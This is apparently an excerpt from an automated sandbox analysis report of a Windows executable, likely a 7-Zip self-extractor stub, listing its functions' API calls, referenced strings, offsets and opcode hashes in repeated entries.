                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@
                                                                                                                  • String ID: %%M/$%%M\
                                                                                                                  • API String ID: 613200358-4143866494
                                                                                                                  • Opcode ID: 3eb134fca1680c0093703720a533bafa1d2fd801437f3d80c27f205d784cf8f2
                                                                                                                  • Instruction ID: 5f6947e2f47a7d655e02fb84317d9747a35bc7200d49f7273ebe403b31479b31
                                                                                                                  • Opcode Fuzzy Hash: 3eb134fca1680c0093703720a533bafa1d2fd801437f3d80c27f205d784cf8f2
                                                                                                                  • Instruction Fuzzy Hash: C911AD3190410EBACF05FFA1D956CEDBB79AE00708F51806AB511760E1EF78A789DB58
                                                                                                                  APIs
                                                                                                                  • _CxxThrowException.MSVCRT(00000000,00414CFC), ref: 0040E4EE
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionThrow
                                                                                                                  • String ID: $JA$4JA$DJA$TJA$hJA$xJA
                                                                                                                  • API String ID: 432778473-803145960
                                                                                                                  • Opcode ID: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
                                                                                                                  • Instruction ID: 5492ea6659e041f1bcf420c4685f7038b08242b420f8f2c51a6428b2159ddc92
                                                                                                                  • Opcode Fuzzy Hash: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
                                                                                                                  • Instruction Fuzzy Hash: 7211A5F0541B419BC7308F16E544587FBF8AF907587218A1FD0AA9BA51D3F8A1888B9C
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040BA46: ??2@YAPAXI@Z.MSVCRT(0000000C,?,0040C20C,004149B0,00000001,?,?,00000000), ref: 0040BA4B
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,004149B0,00000001,?,?,00000000), ref: 0040C20D
                                                                                                                    • Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                                                                                                    • Part of subcall function 0040ADC3: memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                                                                                                    • Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,004149B0,00000001,?,?,00000000), ref: 0040C245
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@$??3@$memmove
                                                                                                                  • String ID: IA$IA$IA
                                                                                                                  • API String ID: 4294387087-924693538
                                                                                                                  • Opcode ID: 85fc5e494f6b2b84d8098d484c2c91b8b6bfa0a3dc3e29a15476b27879269a5e
                                                                                                                  • Instruction ID: 38d37476858cbe2739f158cf8086d9562841ccd83740beefedbf55b6536d6dac
                                                                                                                  • Opcode Fuzzy Hash: 85fc5e494f6b2b84d8098d484c2c91b8b6bfa0a3dc3e29a15476b27879269a5e
                                                                                                                  • Instruction Fuzzy Hash: 20B1C1B1900209DFCB54EFAAC8819DEBBB5BF48304F50852EF919A7291DB38A945CF54
                                                                                                                  APIs
                                                                                                                  • _CxxThrowException.MSVCRT(00100EC3,00414CFC), ref: 0040E83C
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?,?,?), ref: 0040E864
                                                                                                                  • memcpy.MSVCRT(00000000,?,?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?), ref: 0040E88D
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?,?,?), ref: 0040E898
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@??3@ExceptionThrowmemcpy
                                                                                                                  • String ID: IA
                                                                                                                  • API String ID: 3462485524-3293647318
                                                                                                                  • Opcode ID: 87c970ed3d1d6bacfe04aab15aff8add49b6e5554cbd4f9de67434676486f6a2
                                                                                                                  • Instruction ID: e9362666a157510f6fc1816af10740f0f0ab3f4ff6eb75305f8b2a096945a613
                                                                                                                  • Opcode Fuzzy Hash: 87c970ed3d1d6bacfe04aab15aff8add49b6e5554cbd4f9de67434676486f6a2
                                                                                                                  • Instruction Fuzzy Hash: 6811E5736003009BCB28AF57D880D6BFBE9AB84354714C83FEA59A7290D779E8954794
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: wsprintf$ExitProcesslstrcat
                                                                                                                  • String ID: 0x%p
                                                                                                                  • API String ID: 2530384128-1745605757
                                                                                                                  • Opcode ID: beb3389330693802dd4b40a551927b7f0c9c9e0999a7fc1e7fc7f64098bb755c
                                                                                                                  • Instruction ID: 6c9eba3c29ae2a0cc7ccd16f79f39b6d6218d418ab2b897ff95ca6c62132cda7
                                                                                                                  • Opcode Fuzzy Hash: beb3389330693802dd4b40a551927b7f0c9c9e0999a7fc1e7fc7f64098bb755c
                                                                                                                  • Instruction Fuzzy Hash: CF019E7580020CAFDB20AFA0DC45FDA777CBF44305F04486AF945A2081D738F6948FAA
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000B), ref: 004071E0
                                                                                                                    • Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000C), ref: 004071E9
                                                                                                                  • GetSystemMetrics.USER32(00000007), ref: 00407A51
                                                                                                                  • GetSystemMetrics.USER32(00000007), ref: 00407A62
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,000004B8,?,?), ref: 00407B29
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MetricsSystem$??3@
                                                                                                                  • String ID: 100%%
                                                                                                                  • API String ID: 2562992111-568723177
                                                                                                                  • Opcode ID: 8625fd62ee8a1587f51b59dec5492359d41c9a7e7955315cbfbb4a3169dab2fe
                                                                                                                  • Instruction ID: d2e8aa6d75c6757367bbc63d1236441fd7733528c0e5853e38aed7656a5d7d9b
                                                                                                                  • Opcode Fuzzy Hash: 8625fd62ee8a1587f51b59dec5492359d41c9a7e7955315cbfbb4a3169dab2fe
                                                                                                                  • Instruction Fuzzy Hash: 0D31D771A047059FCB24DFA9C9419AEB7F4EF40308B00012EE542A26E1DB78FE44CF99
                                                                                                                  APIs
                                                                                                                  • wsprintfW.USER32 ref: 00407A12
                                                                                                                    • Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
                                                                                                                    • Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B
                                                                                                                  • GetDlgItem.USER32(?,000004B3), ref: 004079C6
                                                                                                                    • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                                                                                                    • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 004079E4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: TextWindow$ItemLength$??3@wsprintf
                                                                                                                  • String ID: (%u%s)
                                                                                                                  • API String ID: 3595513934-2496177969
                                                                                                                  • Opcode ID: 81108d5736a162b6d9564d3eb7a2e93f5e39dd0108d0485d36b03b99dec63073
                                                                                                                  • Instruction ID: 1b031bef2a273fddd3247fbc9e57f9590cc69a100d620b238320e5a3a24b3f72
                                                                                                                  • Opcode Fuzzy Hash: 81108d5736a162b6d9564d3eb7a2e93f5e39dd0108d0485d36b03b99dec63073
                                                                                                                  • Instruction Fuzzy Hash: 1401C8B15042147FDB107B65DC46EAF777CAF44708F10807FF516A21E2DB7CA9448A68
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,0000003C,?,?,?,?,?,?,00406130,?,00000000,?,?,?), ref: 0040220A
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00402211
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: GetNativeSystemInfo$kernel32
                                                                                                                  • API String ID: 2574300362-3846845290
                                                                                                                  • Opcode ID: dcc7844bde5d914e3d472255d944d602bbefc6ee0fc65a521985863f2fff9548
                                                                                                                  • Instruction ID: b757a3d5c4c17e34abb063926c294d8abaed4bc4edbc3347b9308a3de004b423
                                                                                                                  • Opcode Fuzzy Hash: dcc7844bde5d914e3d472255d944d602bbefc6ee0fc65a521985863f2fff9548
                                                                                                                  • Instruction Fuzzy Hash: 88F0B432E1521495CF20BBF48B0D6EF66E89A19349B1004BBD852F31D0E5FCCE8141EE
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,004061B1,?,?,?), ref: 00402198
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0040219F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32
                                                                                                                  • API String ID: 2574300362-3900151262
                                                                                                                  • Opcode ID: e5c6d40c89fc1f3fb34c79c32c3445fbc861d0d884c7149ba98d4f5b826d618a
                                                                                                                  • Instruction ID: b94e249185ae4a70534d65e1a66e6cdcdba3a47a1e4784fabdbc91f5644b18b3
                                                                                                                  • Opcode Fuzzy Hash: e5c6d40c89fc1f3fb34c79c32c3445fbc861d0d884c7149ba98d4f5b826d618a
                                                                                                                  • Instruction Fuzzy Hash: AFD0C934294201DBDB125FA0EE0E7EA3AB9FB04B0BF458035A920A00F0CBBC9644CA5C
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,0040223A), ref: 004021CA
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004021D1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32
                                                                                                                  • API String ID: 2574300362-736604160
                                                                                                                  • Opcode ID: 5a0f418ac3e49e57b967c4010738a21a45af66be6bd625357fa5c872d0fae828
                                                                                                                  • Instruction ID: 817513c890d082da38b6284c2862a66e2f32a8da2897575df7e5c1eb8648f331
                                                                                                                  • Opcode Fuzzy Hash: 5a0f418ac3e49e57b967c4010738a21a45af66be6bd625357fa5c872d0fae828
                                                                                                                  • Instruction Fuzzy Hash: 0DD012342443009BDB515FA09E0D7DA3EB4B705B07F508076A520E11D1CBFCA244C7AC
                                                                                                                  APIs
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402B6F
                                                                                                                    • Part of subcall function 0040272E: MultiByteToWideChar.KERNEL32(00000020,00000000,00000024,?,00000000,?,?,00000020,00000024,00000000,00402ACD,?,?,00000000,00000000,00000000), ref: 00402760
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402ADC
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?), ref: 00402AF7
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C), ref: 00402AFF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@$ByteCharMultiWide
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1731127917-0
                                                                                                                  • Opcode ID: ae4930b9035af11edc18eb83865398ea889af843cb2bb96c85f7d9ecca2ecb95
                                                                                                                  • Instruction ID: 3903ebf3ba6088976d83fc344d3b185d6a20d7f45533e28e7dbc13297377a7b4
                                                                                                                  • Opcode Fuzzy Hash: ae4930b9035af11edc18eb83865398ea889af843cb2bb96c85f7d9ecca2ecb95
                                                                                                                  • Instruction Fuzzy Hash: 2831B3729041156ACB14FFA6DD81DEFB3BCEF00714B51403FF952B31E1EA38AA458658
                                                                                                                  APIs
                                                                                                                  • GetTempPathW.KERNEL32(00000001,00000000,00000002,00000000,00406437,00000000,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FA8
                                                                                                                  • GetTempPathW.KERNEL32(00000001,00000000,00000001,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FC5
                                                                                                                  • wsprintfW.USER32 ref: 00403FFB
                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00404016
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: PathTemp$AttributesFilewsprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1746483863-0
                                                                                                                  • Opcode ID: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
                                                                                                                  • Instruction ID: 4b01c17e8612d334da970e7aef70975a1f373095b445c13461924cc76c43a46f
                                                                                                                  • Opcode Fuzzy Hash: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
                                                                                                                  • Instruction Fuzzy Hash: 1B113672100204BFCB01AF59CC85AADB7F8FF88755F50802EF905972E1DB78AA008B88
                                                                                                                  APIs
                                                                                                                  • CharUpperW.USER32(?,771AE0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                                                                                                  • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                                                                                                  • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B03
                                                                                                                  • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B13
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CharUpper
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 9403516-0
                                                                                                                  • Opcode ID: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
                                                                                                                  • Instruction ID: 0ba0c8867aa888139ba8faa8f8ff432121b60ad667f2455bf366b55ac651d143
                                                                                                                  • Opcode Fuzzy Hash: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
                                                                                                                  • Instruction Fuzzy Hash: 02112E34A11269ABCF108F99C8446BAB7E8FF44356B504467F881E3290D77CDE51EB64
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B
                                                                                                                    • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                                                                                                    • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00407FED
                                                                                                                  • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 0040800D
                                                                                                                  • GetDlgItem.USER32(?,000004B7), ref: 00408020
                                                                                                                  • SetWindowLongW.USER32(00000000,000000FC,Function_00006F37), ref: 0040802E
                                                                                                                    • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                                                                                                    • Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
                                                                                                                    • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
                                                                                                                    • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
                                                                                                                    • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                                                                                                    • Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
                                                                                                                    • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                                                                                                    • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                                                                                                    • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
                                                                                                                    • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92
                                                                                                                    • Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
                                                                                                                    • Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ItemWindow$System$HandleLoadMessageMetricsModuleSend$DirectoryFileFocusIconImageInfoLongShow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2538916108-0
                                                                                                                  • Opcode ID: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
                                                                                                                  • Instruction ID: 9218ed989044434557cb474aaa53437228351995edfdd36a91d94446a14b3a18
                                                                                                                  • Opcode Fuzzy Hash: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
                                                                                                                  • Instruction Fuzzy Hash: 7D1186B1A402146BCB10BBB99D09F9EB7FDEB84B04F00446EB652E31C0D6B8DA008B54
                                                                                                                  APIs
                                                                                                                  • SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 00406814
                                                                                                                  • GetSystemMetrics.USER32(00000031), ref: 0040683A
                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00406849
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00406878
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1900162674-0
                                                                                                                  • Opcode ID: 5f8418ac61918c0235adc1083e46979a63813a21cc36a9cb80778b220a455722
                                                                                                                  • Instruction ID: e152b01862f646c7a4819b14062263d5307cf72e2961abd6127bac75ebed32e6
                                                                                                                  • Opcode Fuzzy Hash: 5f8418ac61918c0235adc1083e46979a63813a21cc36a9cb80778b220a455722
                                                                                                                  • Instruction Fuzzy Hash: A9116376A00205AFDB10DF94DC88FEAB7B8EB08300F0180AAED06A7291DB74DE54CF54
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040749F
